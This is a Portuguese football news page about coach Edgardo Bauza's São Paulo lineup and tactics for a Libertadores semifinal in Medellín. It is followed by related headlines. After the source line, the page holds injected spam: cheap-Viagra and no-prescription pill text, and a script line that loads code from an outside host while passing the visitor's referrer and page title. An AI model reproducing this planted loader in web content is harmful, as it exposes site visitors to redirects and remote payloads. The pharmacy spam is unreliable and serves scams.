Destaque

Bauza escala São Paulo com novidade no meio de campo

Denis, Bruno, Lugano, Rodrigo Caio e Mena; Hudson, Thiago Mendes, Wesley, Centurión e Michel Bastos; Calleri.

Foi esse time que Edgardo Bauza treinou, em grande parte do tempo com portas fechadas, e que começará jogando a semifinal da Libertadores, entre São Paulo e Atlético Nacional, em Medellín. Pouco depois de os jornalistas terem acesso à atividade, os jogadores já passaram a exercícios mais leves.

Sem Paulo Henrique Ganso, com lesão na coxa direita, o Patón sabe que não tem nenhum outro jogador no elenco que tenha suas características. Então, espera que Centurión, Michel Bastos e Wesley façam uma espécie de “rodízio” na função, em apoio a Calleri.

– O que o Ganso faz ninguém pode fazer. Nessa posição pode começar o Centurión, podemos trocar com Michel Bastos. Não há uma posição fixa de um jogador fixo, a ideia é que jogue um centroavante, o Calleri, e um que fique um pouco mais atrás, para fazer os dois volantes do Nacional se retraírem mais – afirmou o treinador.

Em relação à derrota tricolor na quarta-feira passada por 2 a 0 no Morumbi, Bauza colocou Centurión, cuja suspensão de três jogos terminou na última partida, no lugar de Ytalo. Pelo que foi possível notar, o argentino atuou na função de Paulo Henrique Ganso, centralizado, enquanto Wesley e Michel Bastos foram mantidos abertos pelos lados direito e esquerdo, respectivamente.

– Não vamos mudar agora (o sistema tático). Tampouco o Atlético Nacional vai mudar. O que temos de fazer é uma partida inteligente, sabemos as armas que tem o rival, não podemos sair atrás do gol desde o primeiro minuto – explicou o Patón.

Outra mudança foi a volta de Hudson na vaga de João Schmidt, que voltou a sentir dores na coxa direita e chegou a chorar no treino. Depois, foi consolado por Michel Bastos. Atrás, Lugano é mesmo o substituto de Maicon, como já havia sido anunciado previamente pelo treinador.

Bauza deu ênfase ao treino de bolas paradas, com Centurión e Michel Bastos, principalmente, nas cobranças. Para se classificar em 90 minutos, o São Paulo precisa vencer por três ou mais gols de diferença, ou então vantagem de dois gols a partir de 3×1. Se ganhar de 2 a 0, a decisão da vaga na final será nas cobranças de pênaltis.


Veja abaixo os outros trechos mais importantes da entrevista de Bauza:

POSTURA

– Não temos apenas que fazer gols, isso é importante, mas temos de fazer um jogo inteligente. Vamos arriscar em alguns momentos, mas o Nacional é um adversário perigoso, principalmente quando tem a bola. A ideia é ser compacto, defender e atacar com os 11.

JOÃO SCHMIDT

– É uma pena, está com dor muscular e, talvez, eu não consiga levá-lo ao banco de reservas. É uma pena, vamos tratar ao longo da noite, mas são situações que não temos como controlar.

ALAN KARDEC

– Ele fez dois gols na última partida, graças a Deus, mas não foram apenas os gols (ressaltando a boa atuação do atacante, que começará no banco).

OPÇÃO MAIS OFENSIVA

– Tenho, tenho, em algum momento poderemos colocá-la em campo.

Fonte: Ge take on at an easy rate drugs on line

Buy cheap Viagra online

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; acquire at low price generic pills no rx – http://www.zombiecommand.com/zombies/acquire-at-low-price-generic-pills-no-rx/

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque

Mais em Destaque

Everton: o ‘aditivo’ que faltava ao motor Tricolor

saopauloadmin20 de junho de 2018

Reforço? Após empresário anunciar proposta oficial por Rômulo, jogador posta foto no CT do São Paulo

saopauloadmin20 de junho de 2018

No melhor momento neste retorno, Hudson faz balanço e exalta Tricolor

saopauloadmin18 de junho de 2018

O que mudou no São Paulo comandado por Aguirre

saopauloadmin15 de junho de 2018

Em boa fase, Everton se torna fundamental no ataque do Tricolor

saopauloadmin14 de junho de 2018

Sonho do Vasco, Alex Teixeira pode reforçar o São Paulo, diz Diário Carioca

saopauloadmin14 de junho de 2018

Com ‘Puskas’ de Nene, Tricolor bate o Vitória e garante G4 antes da Copa

saopauloadmin13 de junho de 2018

Intenção do SP é não perder mais pontos no Morumbi Justamente para que os pontos marcados fora de casa sejam conquistados e não recuperados

saopauloadmin11 de junho de 2018

Nenê celebra quebra de tabu e minimiza irritação com substituição: “Calor do jogo”

saopauloadmin9 de junho de 2018